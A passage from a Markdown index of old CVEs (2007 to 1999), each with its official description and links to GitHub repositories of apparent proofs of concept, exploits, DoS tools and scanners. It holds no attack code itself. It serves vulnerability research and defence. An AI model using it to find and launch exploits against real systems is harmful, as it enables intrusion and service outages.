- [Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377](https://github.com/Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377)
### CVE-2007-6638 (2008-01-04)
March Networks DVR 3204 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames, passwords, device names, and IP addresses via a direct request for scripts/logfiles.tar.gz.
- [alt3kx/CVE-2007-6638](https://github.com/alt3kx/CVE-2007-6638)
### CVE-2007-6750 (2011-12-27)
The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
- [Jeanpseven/slowl0ris](https://github.com/Jeanpseven/slowl0ris)
## 2006
### CVE-2006-0450 (2006-01-27)
phpBB 2.0.19 and earlier allows remote attackers to cause a denial of service (application crash) by (1) registering many users through profile.php or (2) using search.php to search in a certain way that confuses the database.
- [Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities](https://github.com/Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities)
### CVE-2006-0987 (2006-03-03)
The default configuration of ISC BIND before 9.4.1-P1, when configured as a caching name server, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses.
- [pcastagnaro/dns_amplification_scanner](https://github.com/pcastagnaro/dns_amplification_scanner)
### CVE-2006-1236 (2006-03-15)
Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.
- [Axua/CVE-2006-1236](https://github.com/Axua/CVE-2006-1236)
### CVE-2006-2842 (2006-06-06)
PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable
- [karthi-the-hacker/CVE-2006-2842](https://github.com/karthi-the-hacker/CVE-2006-2842)
### CVE-2006-3392 (2006-07-06)
Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.
- [0xtz/CVE-2006-3392](https://github.com/0xtz/CVE-2006-3392)
- [IvanGlinkin/CVE-2006-3392](https://github.com/IvanGlinkin/CVE-2006-3392)
- [Adel-kaka-dz/CVE-2006-3392](https://github.com/Adel-kaka-dz/CVE-2006-3392)
- [gb21oc/ExploitWebmin](https://github.com/gb21oc/ExploitWebmin)
- [kernel-cyber/CVE-2006-3392](https://github.com/kernel-cyber/CVE-2006-3392)
- [g1vi/CVE-2006-3392](https://github.com/g1vi/CVE-2006-3392)
- [brosck/CVE-2006-3392](https://github.com/brosck/CVE-2006-3392)
### CVE-2006-3592 (2006-07-14)
Unspecified vulnerability in the command line interface (CLI) in Cisco Unified CallManager (CUCM) 5.0(1) through 5.0(3a) allows local users to execute arbitrary commands with elevated privileges via unspecified vectors, involving "certain CLI commands," aka bug CSCse11005.
- [adenkiewicz/CVE-2006-3592](https://github.com/adenkiewicz/CVE-2006-3592)
### CVE-2006-3747 (2006-07-28)
Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
- [defensahacker/CVE-2006-3747](https://github.com/defensahacker/CVE-2006-3747)
### CVE-2006-4777 (2006-09-14)
Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446.
- [Mario1234/js-driveby-download-CVE-2006-4777](https://github.com/Mario1234/js-driveby-download-CVE-2006-4777)
### CVE-2006-4814 (2006-12-20)
The mincore function in the Linux kernel before 2.4.33.6 does not properly lock access to user space, which has unspecified impact and attack vectors, possibly related to a deadlock.
- [tagatac/linux-CVE-2006-4814](https://github.com/tagatac/linux-CVE-2006-4814)
### CVE-2006-5051 (2006-09-27)
Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387)
- [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check)
- [ThemeHackers/CVE-2024-6387](https://github.com/ThemeHackers/CVE-2024-6387)
### CVE-2006-6184 (2006-12-01)
Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long filename in a (1) GET or (2) PUT command.
- [shauntdergrigorian/cve-2006-6184](https://github.com/shauntdergrigorian/cve-2006-6184)
- [b03902043/CVE-2006-6184](https://github.com/b03902043/CVE-2006-6184)
### CVE-2006-20001 (2023-01-17)
A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash.\n\nThis issue affects Apache HTTP Server 2.4.54 and earlier.\n
- [Saksham2002/CVE-2006-20001](https://github.com/Saksham2002/CVE-2006-20001)
## 2005
### CVE-2005-0575 (2005-02-27)
Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP GET request.
- [3t3rn4lv01d/CVE-2005-0575](https://github.com/3t3rn4lv01d/CVE-2005-0575)
### CVE-2005-0603 (2005-03-01)
viewtopic.php in phpBB 2.0.12 and earlier allows remote attackers to obtain sensitive information via a highlight parameter containing invalid regular expression syntax, which reveals the path in a PHP error message.
- [Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure](https://github.com/Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure)
### CVE-2005-1125 (2005-04-16)
Race condition in libsafe 2.0.16 and earlier, when running in multi-threaded applications, allows attackers to bypass libsafe protection and exploit other vulnerabilities before the _libsafe_die function call is completed.
- [tagatac/libsafe-CVE-2005-1125](https://github.com/tagatac/libsafe-CVE-2005-1125)
### CVE-2005-1794 (2005-06-01)
Microsoft Terminal Server using Remote Desktop Protocol (RDP) 5.2 stores an RSA private key in mstlsapi.dll and uses it to sign a certificate, which allows remote attackers to spoof public keys of legitimate servers and conduct man-in-the-middle attacks.
- [InitRoot/CVE-2005-1794Scanner](https://github.com/InitRoot/CVE-2005-1794Scanner)
### CVE-2005-2428 (2005-08-03)
Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
- [schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit](https://github.com/schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit)
### CVE-2005-3299 (2005-10-23)
PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
- [RizeKishimaro/CVE-2005-3299](https://github.com/RizeKishimaro/CVE-2005-3299)
- [Cr0w-ui/-CVE-2005-3299-](https://github.com/Cr0w-ui/-CVE-2005-3299-)
## 2004
### CVE-2004-0558 (2004-09-17)
The Internet Printing Protocol (IPP) implementation in CUPS before 1.1.21 allows remote attackers to cause a denial of service (service hang) via a certain UDP packet to the IPP port.
- [fibonascii/CVE-2004-0558](https://github.com/fibonascii/CVE-2004-0558)
### CVE-2004-1561 (2005-02-20)
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
- [ivanitlearning/CVE-2004-1561](https://github.com/ivanitlearning/CVE-2004-1561)
- [ratiros01/CVE-2004-1561](https://github.com/ratiros01/CVE-2004-1561)
- [darrynb89/CVE-2004-1561](https://github.com/darrynb89/CVE-2004-1561)
- [thel1nus/CVE-2004-1561-Notes](https://github.com/thel1nus/CVE-2004-1561-Notes)
### CVE-2004-1769 (2005-03-10)
The "Allow cPanel users to reset their password via email" feature in cPanel 9.1.0 build 34 and earlier, including 8.x, allows remote attackers to execute arbitrary code via the user parameter to resetpass.
- [sinkaroid/shiguresh](https://github.com/sinkaroid/shiguresh)
- [Redsplit/shiguresh](https://github.com/Redsplit/shiguresh)
### CVE-2004-2167 (2005-07-10)
Multiple buffer overflows in LaTeX2rtf 1.9.15, and possibly other versions, allow remote attackers to execute arbitrary code via (1) the expandmacro function, and possibly (2) Environments and (3) TranslateCommand.
- [uzzzval/cve-2004-2167](https://github.com/uzzzval/cve-2004-2167)
### CVE-2004-2271 (2005-07-19)
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
- [kkirsche/CVE-2004-2271](https://github.com/kkirsche/CVE-2004-2271)
- [PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow](https://github.com/PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow)
- [war4uthor/CVE-2004-2271](https://github.com/war4uthor/CVE-2004-2271)
- [pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF](https://github.com/pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF)
### CVE-2004-2449 (2005-08-20)
Roger Wilco 1.4.1.6 and earlier or Roger Wilco Base Station 0.30a and earlier allows remote attackers to cause a denial of service (application crash) via a long, malformed UDP datagram.
- [ParallelVisions/DoSTool](https://github.com/ParallelVisions/DoSTool)
### CVE-2004-2549 (2005-11-21)
Nortel Wireless LAN (WLAN) Access Point (AP) 2220, 2221, and 2225 allow remote attackers to cause a denial of service (service crash) via a TCP request with a large string, followed by 8 newline characters, to (1) the Telnet service on TCP port 23 and (2) the HTTP service on TCP port 80, possibly due to a buffer overflow.
- [alt3kx/CVE-2004-2549](https://github.com/alt3kx/CVE-2004-2549)
### CVE-2004-2687 (2007-09-23)
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
- [h3xcr4ck3r/distccd_rce_CVE-2004-2687](https://github.com/h3xcr4ck3r/distccd_rce_CVE-2004-2687)
- [k4miyo/CVE-2004-2687](https://github.com/k4miyo/CVE-2004-2687)
- [ss0wl/CVE-2004-2687_distcc_v1](https://github.com/ss0wl/CVE-2004-2687_distcc_v1)
### CVE-2004-6768
- [yougboiz/Metasploit-CVE-2004-6768](https://github.com/yougboiz/Metasploit-CVE-2004-6768)
## 2003
### CVE-2003-0001 (2003-01-08)
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
- [marb08/etherleak-checker](https://github.com/marb08/etherleak-checker)
### CVE-2003-0172 (2003-03-29)
Buffer overflow in openlog function for PHP 4.3.1 on Windows operating system, and possibly other OSes, allows remote attackers to cause a crash and possibly execute arbitrary code via a long filename argument.
- [cyberdesu/Remote-Buffer-overflow-CVE-2003-0172](https://github.com/cyberdesu/Remote-Buffer-overflow-CVE-2003-0172)
### CVE-2003-0201 (2003-04-15)
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
- [KernelPan1k/trans2open-CVE-2003-0201](https://github.com/KernelPan1k/trans2open-CVE-2003-0201)
### CVE-2003-0222 (2003-04-30)
Stack-based buffer overflow in Oracle Net Services for Oracle Database Server 9i release 2 and earlier allows attackers to execute arbitrary code via a "CREATE DATABASE LINK" query containing a connect string with a long USING parameter.
- [phamthanhsang280477/CVE-2003-0222](https://github.com/phamthanhsang280477/CVE-2003-0222)
### CVE-2003-0264 (2003-05-08)
Multiple buffer overflows in SLMail 5.1.0.4420 allows remote attackers to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN argument to slmail.exe, (3) a long string to POPPASSWD, or (4) a long password to the POP3 server.
- [adenkiewicz/CVE-2003-0264](https://github.com/adenkiewicz/CVE-2003-0264)
- [fyoderxx/slmail-exploit](https://github.com/fyoderxx/slmail-exploit)
- [war4uthor/CVE-2003-0264](https://github.com/war4uthor/CVE-2003-0264)
- [pwncone/CVE-2003-0264-SLmail-5.5](https://github.com/pwncone/CVE-2003-0264-SLmail-5.5)
- [vrikodar/CVE-2003-0264_EXPLOIT](https://github.com/vrikodar/CVE-2003-0264_EXPLOIT)
- [nobodyatall648/CVE-2003-0264](https://github.com/nobodyatall648/CVE-2003-0264)
### CVE-2003-0282 (2003-05-14)
Directory traversal vulnerability in UnZip 5.50 allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence.
- [silasol/cve-2003-0282](https://github.com/silasol/cve-2003-0282)
### CVE-2003-0358 (2003-05-30)
Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.
- [gmh5225/CVE-2003-0358](https://github.com/gmh5225/CVE-2003-0358)
- [fengjixuchui/CVE-2003-0358](https://github.com/fengjixuchui/CVE-2003-0358)
## 2002
### CVE-2002-0200 (2002-05-03)
Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.
- [alt3kx/CVE-2002-0200](https://github.com/alt3kx/CVE-2002-0200)
### CVE-2002-0201 (2002-05-03)
Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.
- [alt3kx/CVE-2002-0201](https://github.com/alt3kx/CVE-2002-0201)
### CVE-2002-0288 (2002-05-03)
Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request.
- [alt3kx/CVE-2002-0288](https://github.com/alt3kx/CVE-2002-0288)
### CVE-2002-0289 (2002-05-03)
Buffer overflow in Phusion web server 1.0 allows remote attackers to cause a denial of service and execute arbitrary code via a long HTTP request.
- [alt3kx/CVE-2002-0289](https://github.com/alt3kx/CVE-2002-0289)
### CVE-2002-0346 (2002-05-03)
Cross-site scripting vulnerability in Cobalt RAQ 4 allows remote attackers to execute arbitrary script as other Cobalt users via Javascript in a URL to (1) service.cgi or (2) alert.cgi.
- [alt3kx/CVE-2002-0346](https://github.com/alt3kx/CVE-2002-0346)
### CVE-2002-0347 (2002-05-03)
Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.
- [alt3kx/CVE-2002-0347](https://github.com/alt3kx/CVE-2002-0347)
### CVE-2002-0348 (2002-05-03)
service.cgi in Cobalt RAQ 4 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long service argument.
- [alt3kx/CVE-2002-0348](https://github.com/alt3kx/CVE-2002-0348)
### CVE-2002-0448 (2002-06-11)
Xerver Free Web Server 2.10 and earlier allows remote attackers to cause a denial of service (crash) via an HTTP request that contains many "C:/" sequences.
- [alt3kx/CVE-2002-0448](https://github.com/alt3kx/CVE-2002-0448)
### CVE-2002-0740 (2002-07-26)
Buffer overflow in slrnpull for the SLRN package, when installed setuid or setgid, allows local users to gain privileges via a long -d (SPOOLDIR) argument.
- [alt3kx/CVE-2002-0740](https://github.com/alt3kx/CVE-2002-0740)
### CVE-2002-0748 (2003-04-02)
LabVIEW Web Server 5.1.1 through 6.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request that ends in two newline characters, instead of the expected carriage return/newline combinations.
- [fauzanwijaya/CVE-2002-0748](https://github.com/fauzanwijaya/CVE-2002-0748)
### CVE-2002-0991 (2002-08-31)
Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier, based on the Sharity package, allows local users to gain root privileges via long (1) -U, (2) -D, (3) -P, (4) -S, (5) -N, or (6) -u parameters.
- [alt3kx/CVE-2002-0991](https://github.com/alt3kx/CVE-2002-0991)
### CVE-2002-1614 (2005-03-25)
Buffer overflow in HP Tru64 UNIX allows local users to execute arbitrary code via a long argument to /usr/bin/at.
- [wlensinas/CVE-2002-1614](https://github.com/wlensinas/CVE-2002-1614)
### CVE-2002-2420 (2007-11-01)
site_searcher.cgi in Super Site Searcher allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter.
- [krdsploit/CVE-2002-2420](https://github.com/krdsploit/CVE-2002-2420)
### CVE-2002-20001 (2021-11-11)
The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE.
- [c0r0n3r/dheater](https://github.com/c0r0n3r/dheater)
## 2001
### CVE-2001-0550 (2002-06-25)
wu-ftpd 2.6.1 allows remote attackers to execute arbitrary commands via a "~{" argument to commands such as CWD, which is not properly handled by the glob function (ftpglob).
- [gilberto47831/Network-Filesystem-Forensics](https://github.com/gilberto47831/Network-Filesystem-Forensics)
### CVE-2001-0680 (2002-03-09)
Directory traversal vulnerability in ftpd in QPC QVT/Net 4.0 and AVT/Term 5.0 allows a remote attacker to traverse directories on the web server via a "dot dot" attack in a LIST (ls) command.
- [alt3kx/CVE-2001-0680](https://github.com/alt3kx/CVE-2001-0680)
### CVE-2001-0758 (2001-10-12)
Directory traversal vulnerability in Shambala 4.5 allows remote attackers to escape the FTP root directory via "CWD ..." command.
- [alt3kx/CVE-2001-0758](https://github.com/alt3kx/CVE-2001-0758)
### CVE-2001-0931 (2002-02-02)
Directory traversal vulnerability in Cooolsoft PowerFTP Server 2.03 allows attackers to list or read arbitrary files and directories via a .. (dot dot) in (1) LS or (2) GET.
- [alt3kx/CVE-2001-0931](https://github.com/alt3kx/CVE-2001-0931)
### CVE-2001-0932 (2002-02-02)
Buffer overflow in Cooolsoft PowerFTP Server 2.03 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long command.
- [alt3kx/CVE-2001-0932](https://github.com/alt3kx/CVE-2001-0932)
### CVE-2001-0933 (2002-02-02)
Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. "ls C:".
- [alt3kx/CVE-2001-0933](https://github.com/alt3kx/CVE-2001-0933)
### CVE-2001-0934 (2002-02-02)
Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.
- [alt3kx/CVE-2001-0934](https://github.com/alt3kx/CVE-2001-0934)
### CVE-2001-1442 (2005-04-21)
Buffer overflow in innfeed for ISC InterNetNews (INN) before 2.3.0 allows local users in the "news" group to gain privileges via a long -c command line argument.
- [alt3kx/CVE-2001-1442](https://github.com/alt3kx/CVE-2001-1442)
### CVE-2001-3389
- [becrevex/Gaston](https://github.com/becrevex/Gaston)
## 2000
### CVE-2000-0114 (2000-02-08)
Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
- [Cappricio-Securities/CVE-2000-0114](https://github.com/Cappricio-Securities/CVE-2000-0114)
- [Josekutty-K/frontpage-server-extensions-vulnerability-scanner](https://github.com/Josekutty-K/frontpage-server-extensions-vulnerability-scanner)
- [adhamelhansye/CVE-2000-0114](https://github.com/adhamelhansye/CVE-2000-0114)
### CVE-2000-0170 (2000-04-10)
Buffer overflow in the man program in Linux allows local users to gain privileges via the MANPAGER environmental variable.
- [mike182/exploit](https://github.com/mike182/exploit)
### CVE-2000-0649 (2000-08-03)
IIS 4.0 allows remote attackers to obtain the internal IP address of the server via an HTTP 1.0 request for a web page which is protected by basic authentication and has no realm defined.
- [rafaelh/CVE-2000-0649](https://github.com/rafaelh/CVE-2000-0649)
- [stevenvegar/cve-2000-0649](https://github.com/stevenvegar/cve-2000-0649)
- [Downgraderz/PoC-CVE-2000-0649](https://github.com/Downgraderz/PoC-CVE-2000-0649)
### CVE-2000-0979 (2001-01-22)
File and Print Sharing service in Windows 95, Windows 98, and Windows Me does not properly check the password for a file share, which allows remote attackers to bypass share access controls by sending a 1-byte password that matches the first character of the real password, aka the "Share Level Password" vulnerability.
- [Z6543/CVE-2000-0979](https://github.com/Z6543/CVE-2000-0979)
## 1999
### CVE-1999-0016 (1999-09-29)
Land IP denial of service.
- [pexmee/CVE-1999-0016-Land-DOS-tool](https://github.com/pexmee/CVE-1999-0016-Land-DOS-tool)
- [Pommaq/CVE-1999-0016-POC](https://github.com/Pommaq/CVE-1999-0016-POC)
### CVE-1999-0532 (2000-02-04)
A DNS server allows zone transfers.
- [websecnl/Bulk_CVE-1999-0532_Scanner](https://github.com/websecnl/Bulk_CVE-1999-0532_Scanner)
- [Rodney-O-C-Melby/dns-zone-transfer-test](https://github.com/Rodney-O-C-Melby/dns-zone-transfer-test)
### CVE-1999-1053 (2001-09-12)
guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
- [siunam321/CVE-1999-1053-PoC](https://github.com/siunam321/CVE-1999-1053-PoC)